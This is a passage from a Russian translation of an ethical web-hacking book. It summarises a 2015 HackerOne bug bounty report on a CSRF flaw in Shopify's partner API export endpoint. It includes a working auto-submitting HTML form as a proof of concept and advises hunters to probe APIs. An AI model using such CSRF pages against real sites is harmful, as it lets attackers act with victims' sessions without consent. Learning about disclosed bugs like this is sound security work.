Основы этичного веб-хакинга (перевод)
Примеры
1. Экспорт установленных пользователей
Shopify
Сложность: Низкая
Url: https://app.shopify.com/services/partners/api_clients/XXXX/export_-
installed_users
Ссылка на отчет: https://hackerone.com/reports/96470¹²
Дата отчета: 29 октября 2015
Выплаченное вознаграждение: $500
Описание:
API Shopify предоставляет эндпоинт для экспорта списка уста-
новленных пользователей через URL, показанный выше. Уяз-
вимость заключалась в том, что сайт мог сделать запрос к
этому эндпоинту и получить в ответ информацию, посколькуShopify не использовал CSRF-токен для валидации этого за-
проса. В результате, следующий HTML-код мог быть исполь-
зован для отправки формы от имени ничего не подозреваю-
щей жертвы.
1 <html>
2 <head><title>csrf</title></head>
3 <body onLoad=”document.forms[0].submit()”>
4 <form action=”https://app.shopify.com/services/partners\
5 /api_clients/1105664/export_installed_users” method=”GE\
6 T”>
7 </form>
8 </body>
9 </html>
В этом примере при простом посещении страницы Javascript
отправляет форму, которая включает GET-запрос к API Shopify,
используя cookie Shopify, установленные в браузере жертвы
Выводы
Увеличивайте масштаб ваших атак и ищите баги
не только на сайте, но и в API. Эндпоинты API
также являются потенциальной площадкой для
использования уязвимостей, так что стоит пом-
нить об этом, особенно, если вы знаете, что API
мог быть разработан или стать доступным после
того, как был создан веб-интерфейс.
Добавить в библиотеку 